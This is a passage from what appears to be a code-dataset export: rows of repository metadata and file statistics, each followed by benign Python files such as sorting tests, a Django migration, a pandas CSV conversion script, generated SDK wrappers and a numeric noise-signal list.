| 0.036451
| 0.847807
| 0.804112
| 0.763221
| 0.728328
| 0.713295
| 0.665083
| 0
| 0.022342
| 0.191074
| 19,919
| 626
| 1,212
| 31.819489
| 0.774468
| 0.26161
| 0
| 0.509804
| 0
| 0.117647
| 0.608834
| 0.156177
| 0
| 0
| 0
| 0
| 0.063725
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0.093137
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a780dac3769b7b97d40de9440954a1ffc741bea5
| 1,667
|
py
|
Python
|
data_structures/sorting_algos/selection/test_selection.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/sorting_algos/selection/test_selection.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
data_structures/sorting_algos/selection/test_selection.py
|
jeremyCtown/data-structures-and-algorithms
|
d4ba8741f858fb5298f8ce560240373fb7742e20
|
[
"MIT"
] | null | null | null |
import pytest
from selection import selection_smallest_first, selection_largest_first
def test_selection_smallest_random():
    """Smallest-first selection sort orders a shuffled list ascending."""
    shuffled = [54, 26, 93, 17, 77, 31, 44, 55, 20]
    expected = [17, 20, 26, 31, 44, 54, 55, 77, 93]
    assert selection_smallest_first(shuffled) == expected
def test_selection_smallest_nearly_ordered():
    """Smallest-first selection sort fixes a nearly ordered list."""
    nearly_sorted = [1, 2, 3, 4, 6, 7, 8, 9, 5]
    expected = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    assert selection_smallest_first(nearly_sorted) == expected
def test_selection_smallest_reverse_ordered():
    """Smallest-first selection sort handles the worst case (reversed)."""
    reversed_input = [9, 8, 7, 6, 5, 4, 3, 2, 1]
    expected = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    assert selection_smallest_first(reversed_input) == expected
def test_selection_smallest_two_values():
    """Smallest-first selection sort groups heavily duplicated values."""
    duplicates = [8, 3, 8, 3, 8, 3, 8, 8, 3, 3]
    expected = [3, 3, 3, 3, 3, 8, 8, 8, 8, 8]
    assert selection_smallest_first(duplicates) == expected
def test_selection_largest_random():
    """Largest-first selection sort also yields an ascending result."""
    shuffled = [54, 26, 93, 17, 77, 31, 44, 55, 20]
    expected = [17, 20, 26, 31, 44, 54, 55, 77, 93]
    assert selection_largest_first(shuffled) == expected
def test_selection_largest_nearly_ordered():
    """Largest-first selection sort fixes a nearly ordered list."""
    nearly_sorted = [1, 2, 3, 4, 6, 7, 8, 9, 5]
    expected = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    assert selection_largest_first(nearly_sorted) == expected
def test_selection_largest_reverse_ordered():
    """Largest-first selection sort handles a fully reversed list."""
    reversed_input = [9, 8, 7, 6, 5, 4, 3, 2, 1]
    expected = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    assert selection_largest_first(reversed_input) == expected
def test_selection_largest_two_values():
    """Largest-first selection sort groups heavily duplicated values."""
    duplicates = [8, 3, 8, 3, 8, 3, 8, 8, 3, 3]
    expected = [3, 3, 3, 3, 3, 8, 8, 8, 8, 8]
    assert selection_largest_first(duplicates) == expected
| 32.057692
| 80
| 0.622675
| 289
| 1,667
| 3.418685
| 0.134948
| 0.020243
| 0.129555
| 0.036437
| 0.862348
| 0.831984
| 0.831984
| 0.831984
| 0.831984
| 0.831984
| 0
| 0.139078
| 0.206359
| 1,667
| 51
| 81
| 32.686275
| 0.60771
| 0.139772
| 0
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.307692
| 1
| 0.307692
| false
| 0
| 0.076923
| 0
| 0.384615
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a785a92c11a1942b369d747626f832cdbc0d4e03
| 4,269
|
py
|
Python
|
hlwtadmin/migrations/0026_auto_20200415_1628.py
|
Kunstenpunt/havelovewilltravel
|
6a27824b4d3d8b1bf19e0bc0d0648f0f4e8abc83
|
[
"Apache-2.0"
] | 1
|
2020-10-16T16:29:01.000Z
|
2020-10-16T16:29:01.000Z
|
hlwtadmin/migrations/0026_auto_20200415_1628.py
|
Kunstenpunt/havelovewilltravel
|
6a27824b4d3d8b1bf19e0bc0d0648f0f4e8abc83
|
[
"Apache-2.0"
] | 365
|
2020-02-03T12:46:53.000Z
|
2022-02-27T17:20:46.000Z
|
hlwtadmin/migrations/0026_auto_20200415_1628.py
|
Kunstenpunt/havelovewilltravel
|
6a27824b4d3d8b1bf19e0bc0d0648f0f4e8abc83
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0 on 2020-04-15 14:28
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Adds a `start_date_precision`/`end_date_precision` pair to each of the
    # organisation and relation models (and their `historical*` twins), and
    # reworks GigFinderUrl: ordering now prefers the most recently confirmed
    # and synchronized rows, and `last_synchronized` defaults to the epoch.

    dependencies = [
        ('hlwtadmin', '0025_auto_20200414_1705'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='gigfinderurl',
            options={'ordering': ['-last_confirmed_by_musicbrainz', '-last_synchronized']},
        ),
    ] + [
        # Every model gets the identical precision field, end before start,
        # in the same order the generated file originally listed them.
        migrations.AddField(
            model_name=model,
            name=prefix + '_date_precision',
            field=models.PositiveSmallIntegerField(
                choices=[
                    (2, 'Precise up to the year'),
                    (5, 'Precise up to the month'),
                    (8, 'Precise up to the day'),
                ],
                default=2,
            ),
        )
        for model in (
            'historicalorganisation',
            'historicalrelationartistartist',
            'historicalrelationorganisationorganisation',
            'organisation',
            'relationartistartist',
            'relationorganisationorganisation',
        )
        for prefix in ('end', 'start')
    ] + [
        migrations.AlterField(
            model_name='gigfinderurl',
            name='last_synchronized',
            field=models.DateTimeField(default=datetime.datetime(1970, 1, 1, 0, 0, tzinfo=utc)),
        ),
    ]
| 50.223529
| 165
| 0.621926
| 465
| 4,269
| 5.612903
| 0.148387
| 0.124138
| 0.151724
| 0.193103
| 0.842146
| 0.842146
| 0.814943
| 0.814943
| 0.814943
| 0.814943
| 0
| 0.026867
| 0.250176
| 4,269
| 84
| 166
| 50.821429
| 0.788504
| 0.010073
| 0
| 0.794872
| 1
| 0
| 0.346828
| 0.072206
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.038462
| 0
| 0.076923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a79c38b565483682aa7ad9b82c4dfb210e2d6918
| 372
|
py
|
Python
|
Uber Ludwig Examples/French-English Bilingual Pairs/txt_to_csv.py
|
AymaneZizi/Tutorials
|
e67f8d1eba0e4aa4ebb095966a215b48b1efe64a
|
[
"MIT"
] | 559
|
2019-02-21T08:14:34.000Z
|
2022-03-30T21:47:27.000Z
|
Uber Ludwig Examples/French-English Bilingual Pairs/txt_to_csv.py
|
mehdi2019gaied/Tutorials
|
aa4a1735ba9d7f54e1eabdb2780bfcaf031ba90a
|
[
"MIT"
] | 46
|
2019-03-02T18:42:20.000Z
|
2022-03-17T01:34:07.000Z
|
Uber Ludwig Examples/French-English Bilingual Pairs/txt_to_csv.py
|
mehdi2019gaied/Tutorials
|
aa4a1735ba9d7f54e1eabdb2780bfcaf031ba90a
|
[
"MIT"
] | 726
|
2019-02-18T15:52:40.000Z
|
2022-03-27T22:37:54.000Z
|
import os
import pandas as pd
if __name__ == '__main__':
    # Convert the tab-separated English/French sentence pairs into a CSV
    # suitable for the Ludwig example. The source file has no header row,
    # so the two columns are named explicitly.
    df = pd.read_csv(
        '/media/gilbert/948A92E98A92C760/Local_Programming/Datasets/Other/French-English Bilingual Pairs/fra.txt',
        sep='\t',
        header=None,
        names=['english', 'french'],
    )
    # The original called df.head() and discarded the result (a notebook
    # leftover); print it so the sanity check is actually visible.
    print(df.head())
    df.to_csv('/media/gilbert/948A92E98A92C760/Local_Programming/Datasets/Other/French-English Bilingual Pairs/fra.csv')
| 53.142857
| 179
| 0.758065
| 51
| 372
| 5.294118
| 0.607843
| 0.059259
| 0.111111
| 0.22963
| 0.666667
| 0.666667
| 0.666667
| 0.666667
| 0.666667
| 0.666667
| 0
| 0.071217
| 0.094086
| 372
| 7
| 180
| 53.142857
| 0.72997
| 0
| 0
| 0
| 0
| 0.333333
| 0.613941
| 0.423592
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
a7b5abc58573e6dfee77ee4b484a0ff19f1e0d5b
| 14,285
|
py
|
Python
|
accelbyte_py_sdk/api/ugc/wrappers/_admin_group.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/ugc/wrappers/_admin_group.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/ugc/wrappers/_admin_group.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import HeaderStr
from ....core import get_namespace as get_services_namespace
from ....core import run_request
from ....core import run_request_async
from ....core import same_doc_as
from ..models import ModelsCreateGroupRequest
from ..models import ModelsCreateGroupResponse
from ..models import ModelsPaginatedContentDownloadResponse
from ..models import ModelsPaginatedGroupResponse
from ..models import ResponseError
from ..operations.admin_group import AdminCreateGroup
from ..operations.admin_group import AdminDeleteGroup
from ..operations.admin_group import AdminGetAllGroups
from ..operations.admin_group import AdminGetGroup
from ..operations.admin_group import AdminGetGroupContents
from ..operations.admin_group import AdminUpdateGroup
from ..operations.admin_group import SingleAdminDeleteGroup
from ..operations.admin_group import SingleAdminGetAllGroups
from ..operations.admin_group import SingleAdminGetGroup
from ..operations.admin_group import SingleAdminGetGroupContents
from ..operations.admin_group import SingleAdminUpdateGroup
@same_doc_as(AdminCreateGroup)
def admin_create_group(body: ModelsCreateGroupRequest, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for the AdminCreateGroup UGC operation; falls back
    # to the SDK-configured namespace when none is supplied. Code generated
    # (DO NOT EDIT) -- comments only.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminCreateGroup.create(
        body=body,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminCreateGroup)
async def admin_create_group_async(body: ModelsCreateGroupRequest, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of admin_create_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminCreateGroup.create(
        body=body,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminDeleteGroup)
def admin_delete_group(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for AdminDeleteGroup: delete `group_id` belonging to
    # `user_id`; namespace defaults to the SDK-configured one.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminDeleteGroup.create(
        group_id=group_id,
        user_id=user_id,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminDeleteGroup)
async def admin_delete_group_async(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of admin_delete_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminDeleteGroup.create(
        group_id=group_id,
        user_id=user_id,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetAllGroups)
def admin_get_all_groups(user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for AdminGetAllGroups: paginated (limit/offset)
    # listing of `user_id`'s groups.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminGetAllGroups.create(
        user_id=user_id,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetAllGroups)
async def admin_get_all_groups_async(user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of admin_get_all_groups (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminGetAllGroups.create(
        user_id=user_id,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroup)
def admin_get_group(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for AdminGetGroup: fetch one group of `user_id`.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminGetGroup.create(
        group_id=group_id,
        user_id=user_id,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroup)
async def admin_get_group_async(group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of admin_get_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminGetGroup.create(
        group_id=group_id,
        user_id=user_id,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroupContents)
def admin_get_group_contents(group_id: str, user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for AdminGetGroupContents: paginated contents of
    # `group_id` owned by `user_id`.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminGetGroupContents.create(
        group_id=group_id,
        user_id=user_id,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminGetGroupContents)
async def admin_get_group_contents_async(group_id: str, user_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of admin_get_group_contents (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminGetGroupContents.create(
        group_id=group_id,
        user_id=user_id,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminUpdateGroup)
def admin_update_group(body: ModelsCreateGroupRequest, group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for AdminUpdateGroup: update `group_id` of `user_id`
    # with the payload in `body`.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminUpdateGroup.create(
        body=body,
        group_id=group_id,
        user_id=user_id,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(AdminUpdateGroup)
async def admin_update_group_async(body: ModelsCreateGroupRequest, group_id: str, user_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of admin_update_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = AdminUpdateGroup.create(
        body=body,
        group_id=group_id,
        user_id=user_id,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminDeleteGroup)
def single_admin_delete_group(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for SingleAdminDeleteGroup: like admin_delete_group
    # but the operation takes no user_id.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminDeleteGroup.create(
        group_id=group_id,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminDeleteGroup)
async def single_admin_delete_group_async(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of single_admin_delete_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminDeleteGroup.create(
        group_id=group_id,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetAllGroups)
def single_admin_get_all_groups(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for SingleAdminGetAllGroups: paginated group listing
    # without a user_id parameter.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminGetAllGroups.create(
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetAllGroups)
async def single_admin_get_all_groups_async(limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of single_admin_get_all_groups (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminGetAllGroups.create(
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroup)
def single_admin_get_group(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for SingleAdminGetGroup: fetch one group by id,
    # no user_id required.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminGetGroup.create(
        group_id=group_id,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroup)
async def single_admin_get_group_async(group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of single_admin_get_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminGetGroup.create(
        group_id=group_id,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroupContents)
def single_admin_get_group_contents(group_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for SingleAdminGetGroupContents: paginated contents
    # of `group_id`, no user_id required.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminGetGroupContents.create(
        group_id=group_id,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminGetGroupContents)
async def single_admin_get_group_contents_async(group_id: str, limit: Optional[int] = None, offset: Optional[int] = None, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of single_admin_get_group_contents (generated code;
    # comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminGetGroupContents.create(
        group_id=group_id,
        limit=limit,
        offset=offset,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminUpdateGroup)
def single_admin_update_group(body: ModelsCreateGroupRequest, group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Generated wrapper for SingleAdminUpdateGroup: update `group_id` with
    # the payload in `body`, no user_id required.
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminUpdateGroup.create(
        body=body,
        group_id=group_id,
        namespace=namespace,
    )
    return run_request(request, additional_headers=x_additional_headers, **kwargs)
@same_doc_as(SingleAdminUpdateGroup)
async def single_admin_update_group_async(body: ModelsCreateGroupRequest, group_id: str, namespace: Optional[str] = None, x_additional_headers: Optional[Dict[str, str]] = None, **kwargs):
    # Async twin of single_admin_update_group (generated code; comments only).
    if namespace is None:
        namespace, error = get_services_namespace()
        if error:
            return None, error
    request = SingleAdminUpdateGroup.create(
        body=body,
        group_id=group_id,
        namespace=namespace,
    )
    return await run_request_async(request, additional_headers=x_additional_headers, **kwargs)
| 39.570637
| 227
| 0.720126
| 1,697
| 14,285
| 5.82145
| 0.068945
| 0.113574
| 0.08017
| 0.053447
| 0.875493
| 0.825185
| 0.812329
| 0.804231
| 0.786213
| 0.781962
| 0
| 0.000345
| 0.189009
| 14,285
| 360
| 228
| 39.680556
| 0.852395
| 0.053623
| 0
| 0.772414
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037931
| false
| 0
| 0.075862
| 0
| 0.265517
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
38fad5109a004000fd2e1b7345df5be96fc74605
| 238
|
py
|
Python
|
tests/test_util/test_filter_none_kwargs.py
|
u8sand/FAIRshake
|
8f6f3dde42de29b88e9a43bdd43f848382e3bad7
|
[
"Apache-2.0"
] | null | null | null |
tests/test_util/test_filter_none_kwargs.py
|
u8sand/FAIRshake
|
8f6f3dde42de29b88e9a43bdd43f848382e3bad7
|
[
"Apache-2.0"
] | 8
|
2018-06-05T17:01:43.000Z
|
2018-06-22T01:19:39.000Z
|
tests/test_util/test_filter_none_kwargs.py
|
u8sand/FAIRshake
|
8f6f3dde42de29b88e9a43bdd43f848382e3bad7
|
[
"Apache-2.0"
] | 1
|
2018-06-06T17:22:28.000Z
|
2018-06-06T17:22:28.000Z
|
from app.util.filter_none_kwargs import filter_none_kwargs
def test_filter_none_kwargs():
    """None-valued kwargs are dropped; dict positional entries merge in."""
    only_kwargs = filter_none_kwargs(a=None, b='c')
    assert only_kwargs == {'b': 'c'}
    merged = filter_none_kwargs({'a': None, 'b': 'c'}, d=None, e='c')
    assert merged == {'b': 'c', 'e': 'c'}
| 39.666667
| 89
| 0.647059
| 41
| 238
| 3.487805
| 0.365854
| 0.34965
| 0.559441
| 0.307692
| 0.405594
| 0.405594
| 0.405594
| 0.405594
| 0
| 0
| 0
| 0
| 0.121849
| 238
| 5
| 90
| 47.6
| 0.684211
| 0
| 0
| 0
| 0
| 0
| 0.046218
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ac081d8bde20d4cb75c26ebdda39414ba815a92d
| 20,779
|
py
|
Python
|
test_signals.py
|
vladimirnesterov/ten-little-algorithms
|
8df2e90c43e29a69171a3f6e1bf75ad4cd0759b3
|
[
"MIT"
] | null | null | null |
test_signals.py
|
vladimirnesterov/ten-little-algorithms
|
8df2e90c43e29a69171a3f6e1bf75ad4cd0759b3
|
[
"MIT"
] | null | null | null |
test_signals.py
|
vladimirnesterov/ten-little-algorithms
|
8df2e90c43e29a69171a3f6e1bf75ad4cd0759b3
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Wed May 19 11:47:55 2021
@author: Vladimir
"""
noise_signal = [2.7696641934421677, 4.769664193442168, 3.7696641934421677, 3.7696641934421677, 5.769664193442168, 6.769664193442168, 3.7696641934421677, 0.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, -3.2303358065578323, -5.230335806557832, -5.230335806557832, -6.230335806557832, -6.230335806557832, -6.230335806557832, -4.230335806557832, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -1.2303358065578323, 1.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 4.769664193442168, 3.7696641934421677, 1.7696641934421677, 1.7696641934421677, 2.7696641934421677, 3.7696641934421677, 3.7696641934421677, 3.7696641934421677, 4.769664193442168, 5.769664193442168, 7.769664193442168, 4.769664193442168, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -0.23033580655783226, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 3.7696641934421677, 2.7696641934421677, 1.7696641934421677, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -3.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -2.2303358065578323, -4.230335806557832, -3.2303358065578323, -2.2303358065578323, -2.2303358065578323, -3.2303358065578323, -6.230335806557832, -4.230335806557832, -3.2303358065578323, -0.23033580655783226, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 
-0.23033580655783226, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -3.2303358065578323, -0.23033580655783226, 2.7696641934421677, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, 1.7696641934421677, 2.7696641934421677, 2.7696641934421677, 2.7696641934421677, 1.7696641934421677, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -3.2303358065578323, -3.2303358065578323, -0.23033580655783226, -0.23033580655783226, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, 0.7696641934421677, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, 0.7696641934421677, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -2.2303358065578323, 1.7696641934421677, 0.7696641934421677, 0.7696641934421677, -1.2303358065578323, -1.2303358065578323, -0.23033580655783226, -1.2303358065578323, -1.2303358065578323, -2.2303358065578323, -1.2303358065578323, -0.23033580655783226, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -2.2303358065578323, 1.7696641934421677, 1.7696641934421677, -0.23033580655783226, -1.2303358065578323, -0.23033580655783226, 1.7696641934421677, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, 0.7696641934421677, -0.23033580655783226, -2.2303358065578323, -2.2303358065578323, -0.23033580655783226, 0.7696641934421677, -0.23033580655783226, 0.7696641934421677, -1.2303358065578323, 0.7696641934421677, 